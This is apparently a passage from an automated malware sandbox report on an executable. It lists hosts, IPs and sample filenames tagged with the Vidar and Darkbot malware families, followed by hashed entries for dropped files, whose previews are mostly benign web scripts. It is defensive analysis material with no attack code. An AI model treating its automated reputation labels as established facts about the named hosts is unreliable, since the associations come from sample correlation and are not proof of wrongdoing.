w.nanweng.cn | SEMqjw.exe | malicious | Unknown
• 47.102.38.15
w.nanweng.cn | AdobeAcrobatProDC2021.005.20048#U4e2d#U6587#U76f4#U88c5#U7834#U89e3#U7248@2223_16081.exe | malicious | Unknown
• 47.102.38.15
sb.scorecardresearch.com | over.ps1 | malicious | Vidar
• 18.244.18.27
sb.scorecardresearch.com | 6684V5n83w.exe | malicious | Vidar
• 18.244.18.38
sb.scorecardresearch.com | 25F.tmp.exe | malicious | Darkbot
• 18.244.18.38
sb.scorecardresearch.com | BHgwhz3lGN.exe | malicious | Vidar
• 18.244.18.122
sb.scorecardresearch.com | Tool_Unlock_v1.2.exe | malicious | Vidar
• 18.161.69.30
sb.scorecardresearch.com | Hwacaj.exe | malicious | Darkbot
• 18.161.69.8
sb.scorecardresearch.com | JA7cOAGHym.exe | malicious | Vidar
• 18.161.69.117
sb.scorecardresearch.com | aD7D9fkpII.exe | malicious | Vidar
                                                                                                                                                                                                        • 18.165.220.110
                                                                                                                                                                                                        installer.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                        • 18.165.220.106
                                                                                                                                                                                                        skript.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                        • 18.165.220.66
                                                                                                                                                                                                        No context
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):4.396853998737204
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:OvyQnoSD4Vy:OKQnoSD4Vy
                                                                                                                                                                                                        MD5:38826EAD1C12921FFA502F4F0C540746
                                                                                                                                                                                                        SHA1:68B0C1B5FA6035E17459022565CAB4A3C1B2D72B
                                                                                                                                                                                                        SHA-256:577627FE50C90D9AFA863C2405B741AE79462F59E72F9928744EB031051C8B72
                                                                                                                                                                                                        SHA-512:321E1E69F647545A26B7268D463A17CBA3F1EFA8405B1C0DC1E1AF5C5A34A3A49CB0860CFC0F538E8BBEB6A197049BCCA1714FEC29B0B7E36DA364F489F9881F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:[info]..time=2025-1-3..round=1..install=0..
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):127
                                                                                                                                                                                                        Entropy (8bit):4.975928782040279
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:D9yRtFwsSxzqC+eAsOFETYHFk6rZFFCqTUDTyWLKb:JUF+FqCqdFFrFMDTXub
                                                                                                                                                                                                        MD5:8A5FFA326AADE4413DB37A2C29CF8496
                                                                                                                                                                                                        SHA1:D54CCDDC42468F8DBD628434294A68C319C69805
                                                                                                                                                                                                        SHA-256:233BAA509A6C309459494F8A77868E1CC3F1E5F96724D6809495EFADAD0E54F2
                                                                                                                                                                                                        SHA-512:D386E85CACAB6C2F75E0553051377EBBFEB296592C25B6ED99A84A56A61A6A857F95A2CF5D4D1E9FE6ECDF618DFD5433950AF7FC5F4B1A0ABDBCF8EB106422AB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:<root><item name="pageVersions" value="{&quot;hp&quot;:&quot;20241220.296&quot;}" ltime="1759250672" htime="31153643" /></root>
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):49120
                                                                                                                                                                                                        Entropy (8bit):0.0017331682157558962
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Ztt:T
                                                                                                                                                                                                        MD5:0392ADA071EB68355BED625D8F9695F3
                                                                                                                                                                                                        SHA1:777253141235B6C6AC92E17E297A1482E82252CC
                                                                                                                                                                                                        SHA-256:B1313DD95EAF63F33F86F72F09E2ECD700D11159A8693210C37470FCB84038F7
                                                                                                                                                                                                        SHA-512:EF659EEFCAB16221783ECB258D19801A1FF063478698CF4FCE3C9F98059CA7B1D060B0449E6FD89D3B70439D9735FA1D50088568FF46C9927DE45808250AEC2E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1101
                                                                                                                                                                                                        Entropy (8bit):4.829151166001716
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:t0S8eLfl954T0u2y3EO1gRcDrIvQaDxijjfscC:vLfRWtPDuQKIjq
                                                                                                                                                                                                        MD5:91CD11CFCCA65CFACE96153268D71F63
                                                                                                                                                                                                        SHA1:E0BE107728D3BF41D8136220DA897D798A2AC60F
                                                                                                                                                                                                        SHA-256:8EE1E6D7A487C38412D7B375AC4A6BD7E47F70858055EEB7957226ADA05544BE
                                                                                                                                                                                                        SHA-512:4367CE147C7FA4590838F23C47819B8954858128336979E28BA116924B92660A7CBDC9A8292C45C5F26FF591F423F03DFADCB78A772DBE86AC5FBABF0B4E7711
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (684), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):684
                                                                                                                                                                                                        Entropy (8bit):5.166363591063823
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:2Q12lkSF3mVwl/BJWhuSpOYkM3+Pu1w2E1fNPrQ5uj5lD+QgAjTYCXPrQuN:2Q1QkSFr5BJupODpfPrQ8Dn/XPrQuN
                                                                                                                                                                                                        MD5:C1D04951E98B892931D4C2BC34555057
                                                                                                                                                                                                        SHA1:55E6297F3499B4961C8E956F7F088868CD59C769
                                                                                                                                                                                                        SHA-256:7C317940549467B3210D2F72DA000BAC3481ABFDE3AC5358D398EB64DCBC8532
                                                                                                                                                                                                        SHA-512:D427487C00AF5E8D9DB222F8A01521A5C8646AE8E459D517443DAC8EF2DBEC2DDEA91877B095B82CF3E52031E1650C7360811ED8A06E02F85E3517974D36AD96
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                        Preview:(function(){var n,i=(new Date).getTime(),t=_G!==undefined&&_G.RTO!==undefined?_G.RTO:null,r=((n=_G===null||_G===void 0?void 0:_G.EF)===null||n===void 0?void 0:n.infrefcflog)===1;t!=null&&(window.history.scrollRestoration="auto",document.addEventListener("visibilitychange",function(){if(document.visibilityState==="visible"&&window.location.href.indexOf("/search")>=0&&(new Date).getTime()-i>t&&(Log&&Log.Log&&Log.Log("NTRef","DayRefresh","Active"),!r)){var n=window.location.href+(window.location.href.indexOf("dayref=1")<0?"&dayref=1":"");window.location.href=n}}),typeof setTimeout!="undefined"&&setTimeout(function(){Log&&Log.Log&&Log.Log("NTRef","DayRefresh","Inactive")},t))})()
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (44213), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):44213
                                                                                                                                                                                                        Entropy (8bit):5.4731108865747
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:j3K3FC6AwneAIzFn94868I8GuK6HoxT7TbIuw9bNL6rb:bn4t3DOoxL//
                                                                                                                                                                                                        MD5:E917BC77D3F53468F4A6C9D7AF562B04
                                                                                                                                                                                                        SHA1:197D47F29FF3DBB36A888941750195742E6B6FDB
                                                                                                                                                                                                        SHA-256:AB1A27D51C348A05766BF4ADCF53206A5CC77992246BF28ED15E2F9F6930928D
                                                                                                                                                                                                        SHA-512:200F358305578EE7F0B23F985AADD58EF507CD9AC07BCFC8DB7DDD7D48D2CCD1528B5C8B3A20A11DCAF951CAF84781E5A838BA0F5DF9C3C3D843F084FF2F7E94
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:08:01 11:40:12], progressive, precision 8, 160x160, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6817
                                                                                                                                                                                                        Entropy (8bit):7.859219052464007
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:sO4w46jQPjxS2VUxVMkjqHqHfGaOUE37ri:sO346jojxR0WKHfoe
                                                                                                                                                                                                        MD5:0C41EE31B04E978B4882D17690F03A3A
                                                                                                                                                                                                        SHA1:1890E62ABDFF4D2DD0A66E8A10BF5429440A50EE
                                                                                                                                                                                                        SHA-256:97785743A5FFC303FF8B7B465CD12AF8403F7EED2B2D19687E118E2621059741
                                                                                                                                                                                                        SHA-512:88555E4C500A6B416E8A8E783497B1F6925EEAF708991080E3776757102D9D522CA4830CE924ACA23EC55C579AAC5CFCA7116343236FE8BF8A13FB2DFBD104AD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (58445), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):193268
                                                                                                                                                                                                        Entropy (8bit):5.451031497742737
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:crfyd5FO93Qiq6I8khsNyh/P9OZ8TixYE:crfyA93Qx6I8hNyhX91OxYE
                                                                                                                                                                                                        MD5:B13B18DAD52C999261F2110E7C6CD891
                                                                                                                                                                                                        SHA1:A5603362DDE7C02274D03D7515890B2586E79208
                                                                                                                                                                                                        SHA-256:AF0B0E268CE339A24A1855E5139D18BE86D7C98185DB8E0D8EFE7F9C5F53AA78
                                                                                                                                                                                                        SHA-512:A7851AB09FCC339EC8877F53654532635C3C7FCCBD1C4766939677D47472A3221116E066D0A1A487AAC069B7E1B9CDD07A24DB459E24F794B77035F6E73DDD31
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):726
                                                                                                                                                                                                        Entropy (8bit):4.636787858533541
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:tbH41nlcWYiB1+Xl0ML2t1iOfEmmgaUEUZQ6nMAIPWSxs4yPISEIe9t8aayPISEx:t741nTYifqLL2+O7mgaxSQ6MFnE3nkO
                                                                                                                                                                                                        MD5:6601E4A25AB847203E1015B32514B16C
                                                                                                                                                                                                        SHA1:282FE75F6FED3CFC85BD5C3544ADB462ED45C839
                                                                                                                                                                                                        SHA-256:6E5D3FFF70EEC85FF6D42C84062076688CB092A3D605F47260DBBE6B3B836B21
                                                                                                                                                                                                        SHA-512:305C325EAD714D7BCBD25F3ACED4D7B6AED6AE58D7D4C2F2DFFCE3DFDEB0F427EC812639AD50708EA08BC79E4FAD8AC2D9562B142E0808936053715938638B7C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<svg focusable="false" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" enable-background="new 0 0 16 16">.. <path d="M0 0h16v16h-16v-16z" fill="none"/>.. <path fill="#007DAA" d="M11 4h4l-5-4v3c0 .552.447 1 1 1zm-3-1v-3h-4.5c-.828 0-1.5.672-1.5 1.5v13c0 .828.672 1.5 1.5 1.5h10c.828 0 1.5-.672 1.5-1.5v-8.5h-4c-1.654 0-3-1.346-3-3zm4.707 10.707c-.181.181-.431.293-.707.293h-7c-.276 0-.526-.112-.707-.293s-.293-.431-.293-.707.112-.526.293-.707.431-.293.707-.293h7c.276 0 .526.112.707.293s.293.431.293.707-.112.526-.293.707zm0-5.414c.181.181.293.431.293.707s-.112.526-.293.707-.431.293-.707.293h-7c-.276 0-.526-.112-.707-.293s-.293-.431-.293-.707.112-.526.293-.707.431-.293.707-.293h7c.276 0 .526.112.707.293z"/>..</svg>
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2169), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2169
                                                                                                                                                                                                        Entropy (8bit):5.302641155413102
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:1cLdSF8cWOr7dDv8NQtaPVcbnAhaNaswAUbDdDLpmhMi7WViUCS7SDDRb:1cZSDBdDv8saMPgHfLEM8Xb3Rb
                                                                                                                                                                                                        MD5:61533293909D97252C70E82BD574BA68
                                                                                                                                                                                                        SHA1:7408DD25C19AE7BAF954074576A2F73FBB174310
                                                                                                                                                                                                        SHA-256:99EC639C3DDC51E7882FAB9C08EC5A905B49F4B04D1C47B6DF40F3924E81CD8E
                                                                                                                                                                                                        SHA-512:BF8F8879D1CABD6B8B9C6CAF9FC0A6F68362FC62328112636D78A15A4C08B35EA52E1DD8048715F2BD0E945BB0D2D8D7655E68A065942E89316E303BB536BB41
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:(function(){function l(n){return parseFloat((_w.getComputedStyle?_w.getComputedStyle(n):n.currentStyle).width)}var a="results_container",t="sb_shr sw_conv",v="sb_shr sw_conva",y={"ans2 ans_n2 ans_msnO":1},i={"sb_h3 cttl":1},r="sb_ltw",p="sb_ans",n=[],u=!!_G.SPSA,f=u?{ansC:1,results:1,sa_bop:1}:{results:1},e=!1,o=20,w=-28,b=function(){if(typeof _d.querySelector!="undefined"){var n=".sb_shr{left:"+w+o+"px;width:0;float:right;margin-left:5px}.sb_ltw{margin:0 0 0 -55px;clear:both;float:left;display:block;width:50px}.pi_tc{float:right;}";sj_ic(n);sj_evt.bind("sp.enter_conv",g,1);sj_evt.bind("sp.leave_conv",h,1);sj_evt.bind("sp.submit_conv",h)}},k=function(){var u,o,i,n,s,r,t,h;if(!e){for(u=_ge(a),o=u?u.childNodes:[],i=0;i<o.length;i++)if(n=o[i],n.id&&f[n.id]||n.className&&f[n.className])for(s=n?n.childNodes:[],r=0;r<s.length;r++)for(t=s[r].firstChild;t;)h=t.nodeType,h!==3&&h!==8&&d(t),t=t.nextSibling;e=!0}},d=function(n){var i=n.className,t;if(i&&i.indexOf(p)>-1){if(u)for(t=n.firstChild.fir
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):242
                                                                                                                                                                                                        Entropy (8bit):4.86807996961474
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:A909cpDUDUBDhR9c2p83QVhXANO09c8k9Au9c2pHn:AocpwDUBhfc2W3YXANvcpiMc2Bn
                                                                                                                                                                                                        MD5:6C2C6DB3832D53062D303CDFF5E2BD30
                                                                                                                                                                                                        SHA1:B7A064A64CEAE5C9009EF7D6D8F63B90D3933C9D
                                                                                                                                                                                                        SHA-256:06B77EE16A2CD34ACD210B4F2B6E423762EA8874BB26AE5A37DB9DD01A00FF70
                                                                                                                                                                                                        SHA-512:BC2D115B53035B700D727AF9D7EFAF32DD2A39A2344F3F5FA1A82586BE849EC7803E8320661E66AB7DD2A17E64B7897E95BBD84502B91997FA46EBA4E67E8C7D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:function RewardsReportActivity(n){window.sj_rra&&sj_rra(n)}(function(){RewardsReportActivity(document.URL);sj_evt&&sj_evt.bind("acclink:updated",function(){typeof RewardsReportActivity!="undefined"&&RewardsReportActivity(document.URL)},1)})()
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1333), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1333
                                                                                                                                                                                                        Entropy (8bit):5.118534997873121
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:PlQiztVfI2TdzmkUamV2an3pQ8TIOKEKzbkzER8zXOvD6AYlNyUEr040x0e0v0tn:NQ6rGNIyAbAEuzYDCN2rnWJQSya
                                                                                                                                                                                                        MD5:EEE13BD45C83C7611E9E36689E385FBD
                                                                                                                                                                                                        SHA1:5EA35979E3AC518291E4D7179F417971FD0DC874
                                                                                                                                                                                                        SHA-256:E1DCAF1B7BB92C803802ABAB8D544D277ABF34C06693BD2B83BB598C0DBC7496
                                                                                                                                                                                                        SHA-512:1361145E4C71FC176F76AE84D96F057F8DFA7461FB4926B779F3C059B7C6C8E4BCEFA9B883309D3C3AE6895570F293BF6EEC5374C242C48019CBD6202D4D0373
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var CaptionClickable;(function(){function t(){for(var i,r=document.querySelectorAll(".b_caption"),u=document.querySelectorAll(".b_imgcap_altitle"),t=0;t<r.length;t++)i=r[t],i&&n(i);for(t=0;t<u.length;t++)i=u[t],i&&n(i)}function n(n){var t=n.previousElementSibling,f,e,o,u,r,s;if(t&&(f=null,t.tagName==="H2"||t.querySelector("h2")?(e=t.tagName==="H2"?t:t.querySelector("h2"),e&&e.querySelector("a")&&(f=e)):t.tagName==="H3"||t.querySelector("h3")?(o=t.tagName==="H3"?t:t.querySelector("h3"),o&&o.querySelector("a")&&(f=o)):f=n.querySelector("h2, h3"),u=n.querySelector("p"),f&&u&&i(u.classList)&&(r=f.querySelector("a"),r))){if(u.addEventListener("mouseover",function(){r&&(r.style.textDecoration="underline",n.style.cursor="pointer")}),u.addEventListener("mouseout",function(){r&&(r.style.textDecoration="",n.style.cursor="")}),s=u.parentElement,s&&s.tagName==="A")return;u.addEventListener("click",function(){if(r){_w.si_T&&_w.si_T(r.getAttribute("h"));var n=window.getSelection();(n===null||n===voi
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (674), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):674
                                                                                                                                                                                                        Entropy (8bit):5.239693493116514
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:GyX+fnReu8VliHMtm5vXuMp4CWhneMNqOgqpsRWc9mMCDBMw0n:GS4Reu+kSkNCnvVgqSRWzAn
                                                                                                                                                                                                        MD5:8D078E26C28E9C85885F8A362CB80DB9
                                                                                                                                                                                                        SHA1:F486B2745E4637D881422D38C7780C041618168A
                                                                                                                                                                                                        SHA-256:0BF9F3AD9CDBBC4D37C8B9E22DD06CC26EEA12A27EF6C0F95DB6CBE930177461
                                                                                                                                                                                                        SHA-512:B808A972CD44E6BDA01AC1F8D904D5A281F33B9238B8CAAB03DECB6ADB6B494B19DD9BB35E3D1EA3CA914FF4957155F6D2CB5A9B3A00C2195F80F52804FFB244
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var LinksColorOnMD;(function(n){function i(n){while(n&&n.nodeName!=="A")n=n.parentElement;return n}function o(n){if(n.button===0&&!n.ctrlKey&&!n.shiftKey){var f=i(sj_et(n));f&&(Lib.CssClass.add(f,t),r[f.href]=sb_st(function(){u(f)},5e3))}}function u(n){Lib.CssClass.remove(n,t)}function s(n){h(n);var r=i(sj_et(n));r&&Lib.CssClass.remove(r,t)}function h(n){var t=i(sj_et(n)),f;t&&(f=r[t.href],f&&sb_ct(f),e&&u(t))}function f(){for(var n,i=_d.getElementsByTagName("A"),t=0;t<i.length;t++)(n=i[t],n)&&(sj_be(n,"mousedown",o),sj_be(n,"click",s))}var t="b_LinksColorMD",r={},e=sj_cook&&sj_cook.get("SRCHHPGUSR","NEWWND")==="1";n.bind=f;f()})(LinksColorOnMD||(LinksColorOnMD={}))
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (824), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):824
                                                                                                                                                                                                        Entropy (8bit):5.3314854117420465
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2QQ3xVJjKVJ5o7VEioPVKofuVJ0PoRGP2QbAX53CO2Wd6o0YmmBM:AjWUJEhNZsvc8XgO2Wdh0Jm6
                                                                                                                                                                                                        MD5:3FF8EECB7A6996C1056BBE9D4DDE50B4
                                                                                                                                                                                                        SHA1:FDC4D52301D187042D0A2F136CEEF2C005DCBB8B
                                                                                                                                                                                                        SHA-256:01B479F35B53D8078BACA650BDD8B926638D8DAAA6EB4A9059E232DBD984F163
                                                                                                                                                                                                        SHA-512:49E68AA570729CC96ED0FD2F5F406D84869772DF67958272625CBA9D521CA508955567E12573D7C73D7E7727260D746B535C2CE6A3ACE4952EDF8FD85F3DB0DD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:(function(){function i(){var f="data-load",u,i;if(n&&!n.hasAttribute(f))try{if(_d.body.appendChild(n),typeof sj_gx=="function"){if(u=r.replace("%IG%",_G.IG).replace("%IID%",n.getAttribute("data-iid")).replace("%PARTNER%",n.getAttribute("data-ptn")).replace("%ENABLEP%",n.getAttribute("data-ep")).replace("%ICONPRELOADED%",n.getAttribute("data-iconpl")),n.setAttribute(f,"1"),i=sj_gx(),!i)return null;i.onreadystatechange=function(){typeof sj_appHTML=="function"&&4==i.readyState&&200==i.status&&sj_appHTML(n,i.responseText)};i.open("GET",t?SbiTst.at(u):u,!0);i.send(null)}}catch(e){}}function u(){if(n){var r=n.getAttribute("data-evt");r&&!t?sj_evt.bind(r,i,!0):i()}}var r="/images/sbi?mmasync=1&ig=%IG%&iid=%IID%&ptn=%PARTNER%&ep=%ENABLEP%&iconpl=%ICONPRELOADED%",n=_ge("sbicom_loader"),t=typeof SbiTst!="undefined";u()})()
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65447)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):89947
                                                                                                                                                                                                        Entropy (8bit):5.290839266829335
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:ENjxXU9rnxD9o5EZxkMVC6YLtg7HtDuU3zh8cmnPMEgWzJvBQUmkm4M5gPtcNRQK:EcqmCU3zhINzfmR4lb3e34UQ47GKL
                                                                                                                                                                                                        MD5:CF2FBBF84281D9ECBFFB4993203D543B
                                                                                                                                                                                                        SHA1:832A6A4E86DAF38B1975D705C5DE5D9E5F5844BC
                                                                                                                                                                                                        SHA-256:A6F3F0FAEA4B3D48E03176341BEF0ED3151FFBF226D4C6635F1C6039C0500575
                                                                                                                                                                                                        SHA-512:493A1FE319B5C2091F9BB85E5AA149567E7C1E6DC4B52DF55C569A81A6BC54C45E097024427259FA3132F0F082FE24F5F1D172F7959C131347153A8BCA9EF679
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:/*! jQuery v3.6.3 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,y=n.hasOwnProperty,a=y.toString,l=a.call(Object),v={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},S=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||S).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3363), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3363
                                                                                                                                                                                                        Entropy (8bit):5.195022922251816
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:rVnoyUQXHE2ugs6SI7kVsP1mB88bTg7IYeYU5qnjRXpHNXhgkGq:Z+yhCPFy12dbTQ3k5GjZjr
                                                                                                                                                                                                        MD5:FABB77C7AE3FD2271F5909155FB490E5
                                                                                                                                                                                                        SHA1:CDE0B1304B558B6DE7503D559C92014644736F88
                                                                                                                                                                                                        SHA-256:E482BF4BAAA167335F326B9B4F4B83E806CC21FB428B988A4932C806D918771C
                                                                                                                                                                                                        SHA-512:CABB38F7961AB11449A6E895657D39C947D422F0B3E1DA976494C53203E0E91ADFC514B6100E632939C4335C119165D2330512CAA7D836A6C863087775EDAA9F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:var __spreadArray=this&&this.__spreadArray||function(n,t,i){if(i||arguments.length===2)for(var r=0,f=t.length,u;r<f;r++)!u&&r in t||(u||(u=Array.prototype.slice.call(t,0,r)),u[r]=t[r]);return n.concat(u||Array.prototype.slice.call(t))},AccountLink;(function(n){function h(n,t){var i=a(n.accLinkRefreshEndPointUrl),r={url:i,requestType:"GET",onSuccess:t.onSuccess,onError:t.onError};v(r)}function s(n){var t=c(n);h(n,t)}function c(n){return{onSuccess:function(n){var e=sb_gt(),o=Math.floor(e/1e3)*1e3,f;sj_cook.set(r,u,o.toString(),!0,"/");t("Refresh Account Link info Success");i("onRefreshAccountLinkInfoResponse","success");f={IsTenantAllowAccountLink:n.IsTenantAllowAccountLink,HasLinkedAccount:n.HasLinkedAccount};n.AccountLinkUpdated&&(t("fire acclink:updated"),sj_evt.fire("acclink:updated",f));n.HasLinkedAccount&&n.IsTenantAllowAccountLink&&i("onRefreshAccountLinkInfoResponse","hasActiveLinkedAccount")},onError:function(f,e,o){var s=sb_gt(),h=Math.floor(s/1e3)*1e3,c=h-(n.refreshAccountLink
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=5, xresolution=74, yresolution=82, resolutionunit=2, software=GIMP 2.10.8, datetime=2019:07:31 17:59:08], progressive, precision 8, 160x160, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5944
                                                                                                                                                                                                        Entropy (8bit):7.819206752415454
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:sUbkQe7dQVaRFmwmIE1KFxQ5JKPxCLNO8XrhNOyYSIyQ3DEmISwnFlE6NlG:s+od96rIE1KRCLHXl4DPzEmISwFlE6Nc
                                                                                                                                                                                                        MD5:F6E70DA298349AD94215F0B4A6875037
                                                                                                                                                                                                        SHA1:96F08A674EDB118B6862663ADA27CCCD56B44481
                                                                                                                                                                                                        SHA-256:68B6356BA9F37FF17EAE98BC094A493075F83D446B1E88F1ED32C2926E72E76C
                                                                                                                                                                                                        SHA-512:AFA16D89B1395F1318F42757F9451553F425539087E2EE40EC9FB14EC1FEB0C80254252951472ACC4AB8D4245E53E75F2C43FE41DAF9EC7DA8526C2F7B669BD4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:PNG image data, 375 x 180, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):23972
                                                                                                                                                                                                        Entropy (8bit):7.983082688064765
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:OQCmhN3Hqqm87sSOvS8PJKCqedNV7TMzNjdpNQsjtHnUSQkBmSfYuoq9Dgt:dCmr3KqmIdO68MAnnWNjdpBSSQVfWDgt
                                                                                                                                                                                                        MD5:64C4757048F068394817EE126FDBA8A6
                                                                                                                                                                                                        SHA1:3610DC2EB5E3C09809E94BD0694A06C7A51580FF
                                                                                                                                                                                                        SHA-256:A9FEC8F56726ECA81D0600220A6B168FFF112A5283741FD5EC63509AEDBB51D5
                                                                                                                                                                                                        SHA-512:373EE45E16D231B2FF8A897A357A52A58B63430E0BCF728867879F2E10E55C631589D6F63C1675E2E40EB1EF7CEB59B15DF18013EA0F3FA352A3B36296F14DAB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
